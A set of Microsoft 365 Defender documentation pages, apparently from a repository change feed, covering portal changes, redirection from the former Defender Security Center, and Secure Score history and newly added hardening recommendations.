-|Information governance||See [Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)||
-|Threat management|[Email & Collaboration](https://security.microsoft.com/homepage)|||
-|Permissions|[Permissions & roles](https://security.microsoft.com/emailandcollabpermissions)|See [Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)||
-|Mail flow|||See [Exchange admin center](https://admin.exchange.microsoft.com/#/)|
-|Data privacy||See [Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)||
-|Search|[Audit](https://security.microsoft.com/auditlogsearch?viewid=Async%20Search)|Search (content search)||
-|Reports|[Report](https://security.microsoft.com/emailandcollabreport)|||
-|Service assurance||See [Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)||
-|Supervision||See [Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)||
-|eDiscovery||See [Microsoft Purview compliance portal](https://compliance.microsoft.com/homepage)||
-
-[The Microsoft Defender portal](./microsoft-365-defender.md) at <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank"><https://security.microsoft.com></a> combines security capabilities from existing Microsoft security portals, including the Security & Compliance Center. This improved center helps security teams protect their organization from threats more effectively and efficiently.
-
-If you're familiar with the Security & Compliance Center (protection.office.com), this article describes some of the changes and improvements in The Microsoft Defender portal.
-
-Learn more about the benefits: [Overview of Microsoft Defender XDR](microsoft-365-defender.md)
-
-If you're looking for compliance-related items, visit the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077149" target="_blank">Microsoft Purview compliance portal</a>.
-
-## New and improved capabilities
-
-The left navigation, or quick launch bar, will look familiar. However, there are some new and updated elements in this Defender for Cloud.
-
-With the unified Microsoft Defender XDR solution, you can stitch together the threat signals and determine the full scope and impact of the threat, and how it's currently impacting the organization.
-
-![The The Microsoft Defender portal converged experience.](../../media/mdo-m36d-nav-collapsed.png)
-
-Defender for Office 365 safeguards your organization against malicious threats posed by email messages, links (URLs), and collaboration tools.
-
-![The Defender for Office 365 portal.](../../media/mdo-m365d-nav.png)
-
-### Incidents and alerts
-
-Brings together incident and alert management across your email, devices, and identities. Alerts are now available under the Investigation node, and help provide a broader view of an attack. The alert page provides full context to the alert, by combining attack signals to construct a detailed story. Previously, alerts were specific to different workloads. A new, unified experience now brings together a consistent view of alerts across workloads. You can quickly triage, investigate, and take effective action.
--- [Learn more about Investigations](incidents-overview.md)-- [Learn more about managing alerts](/windows/security/threat-protection/microsoft-defender-atp/review-alerts)-
-![Alerts and Actions quick launch bar in the Microsoft Defender portal.](../../media/m365d-incident-nav.png)
-
-### Hunting
-
-Proactively search for threats, malware, and malicious activity across your endpoints, Office 365 mailboxes, and more by using [advanced hunting queries](advanced-hunting-overview.md). These powerful queries can be used to locate and review threat indicators and entities for both known and potential threats.
-
-[Custom detection rules](/windows/security/threat-protection/microsoft-defender-atp/custom-detection-rules) can be built from advanced hunting queries to help you proactively watch for events that might be indicative of breach activity and misconfigured devices.
-
-Here's an [example on advanced hunting](advanced-hunting-email-threats.md) in Microsoft Defender for Office 365.
-
-### Action center
-
-Action center shows you the investigations created by automated investigation and response capabilities. This automated, self-healing in The Microsoft Defender portal can help security teams by automatically responding to specific events.
-
-Learn more about [Action center](m365d-action-center.md).
-
-#### Threat Analytics
-
-Get threat intelligence from expert Microsoft security researchers. Threat Analytics helps security teams be more efficient when facing emerging threats. Threat Analytics includes:
--- Email-related detections and mitigations from Microsoft Defender for Office 365. This is in addition to the endpoint data already available from Microsoft Defender for Endpoint.-- Incidents view related to the threats.-- Enhanced experience for quickly identifying and using actionable information in the reports.-
-You can access Threat analytics either from the upper left navigation bar in The Microsoft Defender portal, or from a dedicated dashboard card that shows the top threats for your organization.
-
-Learn more about how to [track and respond to emerging threats with threat analytics](./threat-analytics.md).
-
-### Email & collaboration
-
-Track and investigate threats to your users' email, track campaigns, and more. If you've used the Security & Compliance Center, this will be familiar.
-
-![The quick launch menu for Email & collab, on the left navigation pane in the Microsoft Defender portal.](../../media/mdo-m365d-nav.png)
-
-#### Email entity page
-
-The [Email entity page](../office-365-security/mdo-email-entity-page.md) *unifies* email information that had been scattered across different pages or views in the past. Investigating email for threats and trends is *centralized*. Header information and email preview are accessible through the same email page, along with other useful email-related information. Likewise, the detonation status for malicious file attachments or URLs can be found on a tab of the same page. The Email entity page empowers admins and security operations teams to understand an email threat and its status, fast, and then act quickly determine handling.
-
-### Access and Reports
-
-View reports, change your settings, and modify user roles.
-
-![The quick launch menu for The Microsoft Defender portal permissions and reporting, on the left navigation pane in the Microsoft Defender portal.](../../media/m365d-settings-nav.png)
-
-> [!NOTE]
-> For Defender for Office 365 users, you can now *manage and rotate* DKIM keys in The Microsoft Defender portal at <https://security.microsoft.com/authentication?viewid=DKIM>.
->
-> For more information, see [Use DKIM to validate outbound email sent from your custom domain](/microsoft-365/security/office-365-security/email-authentication-dkim-configure).
-
-## What's changed
-
-This table is a quick reference of Threat management where change has occurred between the Security & Compliance center and the Microsoft Defender portal. Click the links to read more about these areas.
-
-|Area|Description of change|
-|||
-|[Investigation](../office-365-security/air-about.md#the-overall-flow-of-air) |Brings together AIR capabilities in [Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365) and [Defender for Endpoint](../defender-endpoint/automated-investigations.md). With these updates and improvements, your security operations team will be able to view details about automated investigations and remediation actions across your email, collaboration content, user accounts, and devices, all in one place.|
-|[Alert queue](../../compliance/alert-policies.md)|The **View alerts** flyout pane in the Security & Compliance Center now includes links to The Microsoft Defender portal. Click on the **Open Alert Page** link and The Microsoft Defender portal opens. You can access the **View alerts** page by clicking on any Office 365 alert in the Alerts queue.|
-|[Attack Simulation training](../office-365-security/attack-simulation-training-insights.md)|Use Attack Simulation training to run realistic attack scenarios in your organization. These simulated attacks can help train your workforce before a real attack impacts your organization. Attack simulation training includes, more options, enhanced reports, and improved training flows help make your attack simulation and training scenarios easier to deliver and manage.|
-
-No changes to these areas:
--- [Explorer](../office-365-security/threat-explorer-real-time-detections-about.md)-- [Policies & Rules](../../compliance/alert-policies.md)-- [Campaign](../office-365-security/campaigns.md)-- [Submissions](../office-365-security/submissions-admin.md)-- [Review](./m365d-action-center.md)-- [Threat Tracker](../office-365-security/threat-trackers.md)-
-Also, check the **Related Information** section at the bottom of this article.
-
-> [!IMPORTANT]
-> The <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> combines security features in <https://securitycenter.windows.com>, and <https://protection.office.com>. However, what you see will depend on your subscription. If you only have Microsoft Defender for Office 365 Plan 1 or 2, as standalone subscriptions, for example, you won't see capabilities around Security for Endpoints and Defender for Office Plan 1 customers won't see items such as Threat Analytics.
-
-> [!TIP]
-> All Exchange Online Protection (EOP) functions will be included in The Microsoft Defender portal, as EOP is a core element of Defender for Office 365.
-
-<a name='microsoft-365-defender-home-page'></a>
-
-## The Microsoft Defender portal Home page
-
-The Home page of the portal surfaces important summary information about the security status of your Microsoft 365 environment.
-
-Using the **Guided tour** you can take a quick tour of Endpoint or Email & collaboration pages. Note that what you see here will depend on if you have license for Defender for Office 365 and/or Defender for Endpoint.
-
-Also included is a link to the Security & Compliance Center for comparison. The last link is to the **What's New** page that describes recent updates.
-
-## Related information
--- [Redirecting Security & Compliance Center to The Microsoft Defender portal](microsoft-365-security-mdo-redirection.md)-- [The Action center](./m365d-action-center.md)-- [Email & collaboration alerts](../../compliance/alert-policies.md#default-alert-policies)-- [Custom detection rules](/microsoft-365/security/defender-endpoint/custom-detection-rules)-- [Create a phishing attack simulation](../office-365-security/attack-simulation-training-simulations.md) and [create a payload for training your people](../office-365-security/attack-simulation-training-payloads.md)-
security Microsoft 365 Security Mde Redirection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-security-mde-redirection.md
- Title: Redirecting from the Microsoft Defender Security Center to the Microsoft Defender portal
-description: How to redirect accounts and sessions from the Defender for Endpoint to Microsoft Defender XDR.
-
- - NOCSH
----
- - m365-security
- - tier3
-- Previously updated : 02/14/2024--
-# Redirecting from the Microsoft Defender Security Center to the Microsoft Defender portal
--
-**Applies to:**
-- Microsoft Defender XDR-- Defender for Endpoint-
-In alignment with Microsoft's cross-domain approach to threat protection with SIEM and Extended Detection and Response (XDR), we've rebranded Microsoft Defender Advanced Threat Protection as Microsoft Defender for Endpoint and unified it into a single integrated portal: the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)).
-
-This guide explains how to enable automatic redirection from the former Microsoft Defender Security Center (securitycenter.windows.com or securitycenter.microsoft.com), to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-> [!NOTE]
-> Microsoft Defender for Endpoint in the Microsoft Defender portal supports [granting access to managed security service providers (MSSPs)](/windows/security/threat-protection/microsoft-defender-atp/grant-mssp-access) in the same that way access is [granted in the former Microsoft Defender Security Center](./mssp-access.md).
-
-## What to expect
-
-Once automatic redirection is enabled, accounts accessing the former Microsoft Defender Security Center at securitycenter.windows.com or securitycenter.microsoft.com are automatically routed to the Microsoft Defender portal at <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank"><security.microsoft.com></a>.
-
-Learn more about what's changed: [Microsoft Defender for Endpoint](microsoft-365-security-center-mde.md).
-
-These changes include redirection for direct access to the former portal via browser, including links pointing towards the former securitycenter.windows.com portal, such as links in email notifications, and links returned by SIEM API calls.
-
-External links from email notifications or SIEM APIs currently contain links to both portals. Once redirection is enabled, both links point to the new Microsoft Defender portal until the old link is eventually removed. We encourage you to adopt the new link pointing to the Microsoft Defender portal.
-
-Refer to the following table for more on links and routing.
-
-## SIEM API routing
-
-| Property | Destination when redirection is OFF | Destination when redirection is ON |
-||||
-| LinkToWDATP | Alert page in securitycenter.windows.com | Alert page in security.microsoft.com |
-| IncidentLinkToWDATP | Incident page in securitycenter.windows.com | Incident page in security.microsoft.com |
-| LinkToMTP | Alert page in security.microsoft.com | Alert page in security.microsoft.com |
-| IncidentLinkToMTP | Incident page in security.microsoft.com | Incident page in security.microsoft.com |
-
-## Email alert notifications
-
-| Property | Destination when redirection is OFF** | Destination when redirection is ON |
-||||
-| Alert page | Alert page in securitycenter.windows.com | Alert page in security.microsoft.com |
-| Incident page |Incident page in securitycenter.windows.com | Incident page in security.microsoft.com |
-| Alert page in Defender for Cloud portal | Alert page in security.microsoft.com | Alert page in security.microsoft.com |
-| Incident page in Defender for Cloud portal | Incident page in security.microsoft.com | Incident page in security.microsoft.com |
-
-## When does this take effect?
-
-Once enabled, this update might take effect almost immediately for some accounts. But the redirection might take longer to propagate to every account in your organization. Accounts in active sessions while this setting is applied won't be ejected from their session and will only be routed to Microsoft Defender XDR after ending their current session and signing back in again.
-
-### Set up portal redirection
-
-To start routing accounts to Microsoft Defender XDR:
-
-1. Make sure you're a global administrator or have security administrator permissions in Microsoft Entra ID.
-
-2. Sign in to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-3. Navigate to **Settings** \> **Endpoints** \> **General** \> **Portal redirection** or [click here](https://security.microsoft.com/preferences2/portal_redirection).
-
-4. Toggle the **Automatic redirection** setting to **On**.
-
-5. Select **Enable** to apply automatic redirection to the Microsoft Defender portal.
-
-> [!IMPORTANT]
-> Enabling this setting doesn't terminate active user sessions. Accounts who are in an active session while this setting is applied are directed to the Microsoft Defender portal after ending their current session and signing in again.
-
-## Can I go back to using the former portal?
-
-If something isn't working for you or if there's anything you're unable to complete through the Microsoft Defender portal, we want to hear about it. If you've encountered any issues with redirection, we encourage you to let us know by using the **Give feedback** submission form.
-
-To revert to the former Microsoft Defender Security Center:
-
-1. Sign in to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> as a global administrator or using and account with security administrator permissions in Microsoft Entra ID.
-
-2. Navigate to **Settings** \> **Endpoints** \> **General** \> **Portal redirection** or [open the page here](https://security.microsoft.com/preferences2/portal_redirection).
-
-3. Toggle the **Automatic redirection** setting to **Off**.
-
-4. Select **Disable** & share feedback when prompted.
-
-This setting can be enabled again at any time.
-
-Once disabled, accounts aren't routed to security.microsoft.com, and you'll have access to the former portal - securitycenter.windows.com or securitycenter.microsoft.com.
-
-## Related information
--- [Microsoft Defender XDR overview](microsoft-365-defender.md)-- [Microsoft Defender for Endpoint in Microsoft Defender XDR](microsoft-365-security-center-mde.md)-- [Microsoft delivers unified SIEM and XDR to modernize security operations](https://www.microsoft.com/security/blog/?p=91813)-- [About Microsoft Defender XDR](https://www.microsoft.com/microsoft-365/security/microsoft-365-defender)-- [Microsoft security portals and admin centers](portals.md)-
security Microsoft Secure Score History Metrics Trends https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-secure-score-history-metrics-trends.md
- Title: Track your Microsoft Secure Score history and meet goals
-description: Gain insights into activity that has affected your Microsoft Secure Score. Discover trends and set goals.
-keywords: microsoft secure score, secure score, office 365 secure score, microsoft security score, Microsoft Defender portal, recommended actions
-
- - NOCSH
----
- - m365-security
- - tier2
-
- - MOE150
- - MET150
Previously updated : 02/16/2021--
-# Track your Microsoft Secure Score history and meet goals
--
-[Microsoft Secure Score](microsoft-secure-score.md) is a measurement of an organization's security posture, with a higher number indicating more recommended actions taken. It can be found at https://security.microsoft.com/securescore in the [Microsoft Defender portal](microsoft-365-defender-portal.md).
-
-## Gain insights into activity that has affected your score
-
-View a graph of your organization's score over time in the **History** tab.
-
-Below the graph is a list of all the actions taken in the selected time range and their attributes, such as resulting points and category. You can customize a date range and filter by category.
--
-If you select the recommended action associated with an activity, the full recommended action flyout will appear.
-
-To view all history for that specific recommended action, select the history link in the flyout.
--
-## Discover trends and set goals
-
-In the **Metrics & trends** tab, there are several graphs and charts to give you more visibility into trends and set goals. You can set the date range for the whole page of visualizations. The visualizations include:
-
-* **Your Secure Score zone** - Customized based on your organization's goals and definitions of good, okay, and bad score ranges.
-* **Regression trend** - A timeline of points that have regressed because of configuration, user, or device changes.
-* **Comparison trend** - How your organization's Secure Score compares to others' over time. This view can include lines representing the score average of organizations with similar seat count and a custom comparison view that you can set.
-* **Risk acceptance trend** - Timeline of recommended actions marked as "risk accepted."
-* **Score changes** - The number of points achieved, points regressed, and changes to your score in the specified date range.
-
-### Compare your score to organizations like yours
-
-There are two places to see how your score compares to organizations that are similar to yours.
-
-#### Comparison bar chart
-
-The comparison bar chart is available on the **Overview** tab. Hover over the chart to view the score and score opportunity.
--
-The comparison data is anonymized so we don't know exactly which others tenants are in the mix.
-
-![Bar graph of similar organization's scores.](../../media/secure-score/secure-score-comparison-screenshot.png)
-
-#### Comparison trend
-
-In the **Metrics & trends** tab, view how your organization's Secure Score compares to others' over time.
--
-## We want to hear from you
-
-If you have any issues, let us know by posting in the [Security, Privacy & Compliance](https://techcommunity.microsoft.com/t5/Security-Privacy-Compliance/bd-p/security_privacy) community. We're monitoring the community and will provide help.
-
-## Related resources
--- [Microsoft Secure Score overview](microsoft-secure-score.md)-- [Assess your security posture](microsoft-secure-score-improvement-actions.md)-- [What's coming](microsoft-secure-score-whats-coming.md)-- [What's new](microsoft-secure-score-whats-new.md)
security Microsoft Secure Score Improvement Actions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-secure-score-improvement-actions.md
- Title: Assess your security posture through Microsoft Secure Score
-description: Describes how to take action to improve your Microsoft Secure Score in the Microsoft Defender portal.
-keywords: microsoft secure score, secure score, office 365 secure score, microsoft security score, Microsoft Defender portal, recommended actions
-
- - NOCSH
------ m365-security-- tier2--- MOE150-- MET150--- seo-marvel-apr2020-- seo-marvel-jun2020 Previously updated : 02/16/2021--
-# Assess your security posture with Microsoft Secure Score
--
-Microsoft Secure Score is a measurement of an organization's security posture, with a higher number indicating more recommended actions taken. It can be found at https://security.microsoft.com/securescore in the [Microsoft Defender portal](microsoft-365-defender.md).
-
-To help you find the information you need more quickly, Microsoft recommended actions are organized into groups:
--- Identity (Microsoft Entra accounts & roles)-- Device (Microsoft Defender for Endpoint, known as [Microsoft Secure Score for Devices](/windows/security/threat-protection/microsoft-defender-atp/tvm-microsoft-secure-score-devices))-- Apps (email and cloud apps, including Office 365 and Microsoft Defender for Cloud Apps)-- Data (through Microsoft Information Protection)-
-In the Microsoft Secure Score overview page, view how points are split between these groups and what points are available. You can also get an all-up view of the total score, historical trend of your secure score with benchmark comparisons, and prioritized recommended actions that can be taken to improve your score.
--
-## Check your current score
-
-To check on your current score, go to the Microsoft Secure Score overview page and look for the tile that says **Your secure score**. Your score will be shown as a percentage, along with the number of points you've achieved out of the total possible points.
-
-Additionally, if you select the **Include** button next to your score, you can choose different views of your score. These different score views will display in the graph on the score tile and the point breakdown chart.
-
-The following are scores you can add to your view of your overall score to give you a fuller picture of your overall score:
--- **Planned score**: Show projected score when planned actions are completed-- **Current license score**: Show score that can be achieved with your current Microsoft license-- **Achievable score**: Show score that can be achieved with your Microsoft licenses and current risk acceptance-
-This view is what it will look like if you've included all possible score views:
--
-## Take action to improve your score
-
-The **recommended actions** tab lists the security recommendations that address possible attack surfaces. It also includes their status (to address, planned, risk accepted, resolved through third party, resolved through alternate mitigation, and completed). You can search, filter, and group all the recommended actions.
-
-Once you have completed an action it can take between 24-48 hours for the changes to be reflected in your secure score.
-
-### Ranking
-
-Ranking is based on the number of points left to achieve, implementation difficulty, user impact, and complexity. The highest ranked recommended actions have a large number of points remaining with low difficulty, user impact, and complexity.
-
-### View recommended action details
-
-When you select a specific recommended action, a full page flyout appears.
--
-To complete the action, you have a few options:
--- Select **Manage in Microsoft Defender XDR** to go to the configuration screen and make the change. You'll then gain the points that the action is worth, visible in the flyout. Points generally take about 24 hours to update.--- Select **Share** to copy the direct link to the recommended action. You can also choose the platform to share the link, such as email, Microsoft Teams, or Microsoft Planner.-
-Add **Notes** to keep track of progress or anything else you want to comment on. If you add your own **tags** to the recommended action, you can filter by those tags.
-
-### Choose a recommended action status
-
-Choose any statuses and record notes specific to the recommended action.
--- **To address** - You recognize that the recommended action is necessary and plan to address it at some point in the future. This state also applies to actions that are detected as partially, but not fully completed.-- **Planned** - There are concrete plans in place to complete the recommended action.-- **Risk accepted** - Security should always be balanced with usability, and not every recommendation will work for your environment. When that is the case, you can choose to accept the risk, or the remaining risk, and not enact the recommended action. You won't be given any points for this status. You can view this action in history or undo it at any time.-- **Resolved through third party** and **Resolved through alternate mitigation** - The recommended action has already been addressed by a third-party application or software, or an internal tool. You'll gain the points that the action is worth, so your score better reflects your overall security posture. If a third party or internal tool no longer covers the control, you can choose another status. Keep in mind, Microsoft will have no visibility into the completeness of implementation if the recommended action is marked as either of these statuses.-
-#### Recommended action status for devices
-
-You won't be able to choose a status for Secure Score recommended actions in the "Device" category, instead, you'll be directed to the associated [Microsoft Defender Vulnerability Management security recommendation](/windows/security/threat-protection/microsoft-defender-atp/tvm-security-recommendation) to take action.
-
-> [!NOTE]
-> If you choose to create a 'Global exception' in the Defender Vulnerability management security recommendation, the status in the Microsoft Secure Score recommended action will be updated with the exception justification. Updates may take up to 2 hours.
->
-> If you choose to create an 'Exception per device group' in the Defender Vulnerability manage security recommendation, Secure Score will not be updated and the recommended action will remain as 'To address'.
-
-#### Completed recommended actions
-
-Recommended actions have a "completed" status once all possible points for the recommended action have been achieved. Completed recommended actions are confirmed through Microsoft data, and you can't change the status.
-
-### Assess information and review user impact
-
-The section called **At a glance** will tell you the category, attacks it can protect against, and the product.
-
-**User impact** is what the users will experience if the recommended action is enacted, and the **Users affected** are the people who will be impacted.
-
-### Implement the recommended action
-
-The **Implementation** section shows any prerequisites, step-by-step next steps to complete the recommended action, the current implementation status of the recommended action, and any learn more links.
-
-Prerequisites include any licenses that are needed or actions to be completed before the recommended action is addressed. Make sure you have enough seats in your license to complete the recommended action and that those licenses are applied to the necessary users.
-
-## We want to hear from you
-
-If you have any issues, let us know by posting in the [Security, Privacy & Compliance](https://techcommunity.microsoft.com/t5/Security-Privacy-Compliance/bd-p/security_privacy) community. We're monitoring the community and will provide help.
-
-## Related resources
--- [Microsoft Secure Score overview](microsoft-secure-score.md)-- [Track your Microsoft Secure Score history and meet goals](microsoft-secure-score-history-metrics-trends.md)-- [What's coming](microsoft-secure-score-whats-coming.md)-- [What's new](microsoft-secure-score-whats-new.md)
security Microsoft Secure Score Whats New https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-secure-score-whats-new.md
- Title: What's new in Microsoft Secure Score
-description: Describes changes to Microsoft Secure Score in the Microsoft Defender portal.
- - NOCSH
-----
- - m365-security
- - tier2
-
- - MOE150
- - MET150
Previously updated : 02/19/2024--
-# What's new in Microsoft Secure Score
--
-To make Microsoft Secure Score a better representative of your security posture, we continue to add new features and improvement actions.
-
-The more improvement actions you take, the higher your Secure Score will be. For more information, see [Microsoft Secure Score](microsoft-secure-score.md).
-
-Microsoft Secure Score can be found at <https://security.microsoft.com/securescore> in the [Microsoft Defender portal](microsoft-365-defender-portal.md).
-
-## February 2024
-
-The following recommendation is added as a Microsoft Secure Score improvement action:
-
-**Microsoft Defender for Identity:**
--- Edit insecure ADCS certificate enrollment IIS endpoints (ESC8)-
-## January 2024
-
-The following recommendations have been added as Microsoft Secure Score improvement actions:
-
-**Microsoft Entra (AAD):**
--- Ensure 'Phishing-resistant MFA strength' is required for Administrators. -- Ensure custom banned passwords lists are used. -- Ensure 'Windows Azure Service Management API' is limited to administrative roles.-
-**Admin Center:**
--- Ensure ΓÇÿUser owned apps and servicesΓÇÖ is restricted. -
-**Microsoft Forms:**
--- Ensure internal phishing protection for Forms is enabled.
-
-**Microsoft Share Point:**
--- Ensure that SharePoint guest users cannot share items they don't own.-
-### Defender for Cloud Apps support for multiple instances of an app
-
-Microsoft Defender for Cloud Apps now supports Secure Score recommendations across multiple instances of the same app. For example, if you have multiple instances of AWS, you can configure and filter for Secure Score recommendations for each instance individually.
-
-For more information, see [Turn on and manage SaaS security posture management (SSPM)](/defender-cloud-apps/security-saas).
-
-## December 2023
-
-The following recommendations have been added as Microsoft Secure Score improvement actions:
-
-**Microsoft Entra (AAD):**
--- Ensure 'Microsoft Azure Management' is limited to administrative roles.-
-**Microsoft Sway:**
--- Ensure that Sways cannot be shared with people outside of your organization.-
-**Microsoft Exchange Online:**
--- Ensure users installing Outlook add-ins is not allowed.-
-**Zendesk:**
--- Enable and adopt two-factor authentication (2FA).-- Send a notification on password change for admins, agents, and end users.-- Enable IP restrictions.-- Block customers to bypass IP restrictions.-- Admins and agents can use the Zendesk Support mobile app.-- Enable Zendesk authentication.-- Enable session timeout for users.-- Block account assumption.-- Block admins to set passwords.-- Automatic redaction.-
-**Net Document:**
--- Adopt Single sign on (SSO) in netDocument.-
-**Meta Workplace:**
--- Adopt Single sign on (SSO) in Workplace by Meta.-
-**Dropbox:**
--- Enable web session timeout for web users.-
-**Atlassian:**
--- Enable multi-factor authentication (MFA).-- Enable Single Sign On (SSO).-- Enable strong Password Policies.-- Enable session timeout for web users.-- Enable Password expiration policies.-- Atlassian mobile app security - Users that are affected by policies.-- Atlassian mobile app security - App data protection.-- Atlassian mobile app security - App access requirement.-
-**Microsoft Defender for Identity:
-New Active Directory Certificate Services (ADCS) related recommendations:**
--- **Certificate templates recommended actions** :
- - [Prevent users to request a certificate valid for arbitrary users based on the certificate template (ESC1)](/defender-for-identity/security-assessment-prevent-users-request-certificate)
- - [Edit overly permissive Certificate Template with privileged EKU (Any purpose EKU or No EKU) (ESC2)](/defender-for-identity/security-assessment-edit-overly-permissive-template)
- - [Misconfigured enrollment agent certificate template (ESC3)](/defender-for-identity/security-assessment-edit-misconfigured-enrollment-agent)
- - [Edit misconfigured certificate templates ACL (ESC4)](/defender-for-identity/security-assessment-edit-misconfigured-acl)
- - [Edit misconfigured certificate templates owner](/defender-for-identity/security-assessment-edit-misconfigured-owner)
-- **Certificate authority recommended actions** :
- - [Edit vulnerable Certificate Authority setting](/defender-for-identity/security-assessment-edit-vulnerable-ca-setting)
- - [Edit misconfigured Certificate Authority ACL (ESC7)](/defender-for-identity/security-assessment-edit-misconfigured-ca-acl)
- - [Enforce encryption for RPC certificate enrollment interface (ESC8)](/defender-for-identity/security-assessment-enforce-encryption-rpc)
-
-For more information, see [Microsoft Defender for Identity's security posture assessments](/defender-for-identity/security-assessment).
-
-## October 2023:
-
-The following recommendations have been added as Microsoft Secure Score improvement actions:
-
-**Microsoft Entra (AAD):**
--- Ensure 'Phishing-resistant MFA strength' is required for administrators.-- Ensure custom banned passwords lists are used.-
-**Microsoft Sway:**
--- Ensure that Sways cannot be shared with people outside of your organization.-
-**Atlassian:**
--- Enable multi-factor authentication (MFA).-- Enable Single Sign On (SSO).-- Enable strong Password Policies.-- Enable session timeout for web users.-- Enable Password expiration policies.-- Atlassian mobile app security - Users that are affected by policies.-- Atlassian mobile app security - App data protection.-- Atlassian mobile app security - App access requirement.-
-## September 2023:
-
-The following recommendations have been added as Microsoft Secure Score improvement actions:
-
-**Microsoft Information Protection:**
--- Ensure Microsoft 365 audit log search is enabled.-- Ensure DLP policies are enabled for Microsoft Teams.-
-**Exchange Online:**
--- Ensure that SPF records are published for all Exchange Domains.-- Ensure modern authentication for Exchange Online is enabled.-- Ensure MailTips are enabled for end users.-- Ensure mailbox auditing for all users is enabled.-- Ensure additional storage providers are restricted in Outlook on the web.-
-**Microsoft Defender for Cloud Apps:**
--- Ensure Microsoft Defender for Cloud Apps is enabled.-
-**Microsoft Defender for Office:**
--- Ensure Exchange Online Spam Policies are set to notify administrators.-- Ensure all forms of mail forwarding are blocked and/or disabled.-- Ensure Safe Links for Office Applications is enabled.-- Ensure Safe Attachments policy is enabled.-- Ensure that an anti-phishing policy has been created. -
-## August 2023
-
-The following recommendations have been added as Microsoft Secure Score improvement actions:
-
-**Microsoft Information Protection:**
--- Ensure Microsoft 365 audit log search is enabled.-
-**Microsoft Exchange Online:**
--- Ensure modern authentication for Exchange Online is enabled.-- Ensure Exchange Online Spam Policies are set to notify administrators.-- Ensure all forms of mail forwarding are blocked and/or disabled.-- Ensure MailTips are enabled for end users.-- Ensure mailbox auditing for all users is enabled.-- Ensure additional storage providers are restricted in Outlook on the web.-
-**Microsoft Entra ID:**
-
-To see the following new Microsoft Entra controls in the Office 365 connector, you need to turn on Microsoft Defender for Cloud Apps in the App connectors settings page:
--- Ensure password protection is enabled for on-premises Active Directory.-- Ensure 'LinkedIn account connections' is disabled.-
-**SharePoint:**
--- Ensure Safe Links for Office Applications is enabled.-- Ensure Safe Attachments for SharePoint, OneDrive, and Microsoft Teams is enabled.-- Ensure that an anti-phishing policy has been created.-
-To see the following new SharePoint controls in the Office 365 connector, you need to turn on Microsoft Defender for Cloud Apps in the App connectors settings page:
--- Ensure SharePoint external sharing is managed through domain allowlists/blocklists.-- Block OneDrive for Business sync from unmanaged devices.-
-### Microsoft Secure Score integration with Microsoft Lighthouse 365
-
-Microsoft 365 Lighthouse helps Managed Service Providers (MSPs) grow their business and deliver services to customers at scale from a single portal. Lighthouse allows customers to standardize configurations, manage risk, identify artificial intelligence (AI)-driven sales opportunities, and engage with customers to help them maximize their investment in Microsoft 365.
-
-We've integrated Microsoft Secure Score into Microsoft 365 Lighthouse. This integration provides an aggregate view of the Secure Score across all managed tenants, and Secure Score details for each individual tenant. Access to Secure Score is available from a new card on the Lighthouse homepage or by selecting a tenant on the Lighthouse Tenants page.
-
-> [!NOTE]
-> The integration with Microsoft Lighthouse 365 is available to Microsoft partners who use the Cloud Solution Provider (CSP) program to manage customer tenants.
-
-<a name='microsoft-secure-score-permissions-integration-with-microsoft-365-defender-unified-role-based-access-control-rbac-is-now-in-public-preview'></a>
-
-### Microsoft Secure Score permissions integration with Microsoft Defender XDR Unified role-based access control (RBAC) is now in Public Preview
-
-Previously, only Microsoft Entra global roles (such as Global Administrators) could access Microsoft Secure Score. Now, you can control access and grant granular permissions for the Microsoft Secure Score experience as part of the Microsoft Defender XDR Unified RBAC model.
-
-You can add the new permission and choose the data sources the user has access to by selecting the **Security posture** permissions group when creating the role. For more information, see [Create custom roles with Microsoft Defender XDR Unified RBAC](./create-custom-rbac-roles.md). Users see Secure Score data for the data sources they have permissions to.
-
-A new data source **Secure Score ΓÇô Additional data source** is also available. Users with permissions to this data source have access to additional data within the Secure score dashboard. For more information on additional data sources, see [Products included in Secure Score](./microsoft-secure-score.md#products-included-in-secure-score).
-
-## July 2023
-
-The following Microsoft Defender for Identity recommendations were added as Microsoft Secure Score improvement actions:
--- Remove the attribute 'password never expires' from accounts in your domain.-- Remove access rights on suspicious accounts with the Admin SDHolder permission.-- Manage accounts with passwords more than 180 days old.-- Remove local admins on identity assets.-- Remove non-admin accounts with DCSync permissions.-- Start your Defender for Identity deployment, installing Sensors on Domain Controllers and other eligible servers.-
-The following Google workspace recommendation were added as a Microsoft Secure Score improvement action:
--- Enable multifactor authentication (MFA)-
-In order to view this new control, Google workspace connector in Microsoft Defender for Cloud Apps must be configured via the App connectors settings page.
-
-## May 2023
-
-A new Microsoft Exchange Online recommendation is now available as Secure Score improvement action:
--- Ensure mail transport rules don't allow specific domains.-
-New Microsoft SharePoint recommendations are now available as Secure Score improvement actions:
--- Ensure modern authentication for SharePoint applications is required.-- Ensure that external users can't share files, folders, and sites they don't own.-
-## April 2023
-
-New recommendations are now available in Microsoft Secure Score for customers with an active Microsoft Defender for Cloud Apps license:
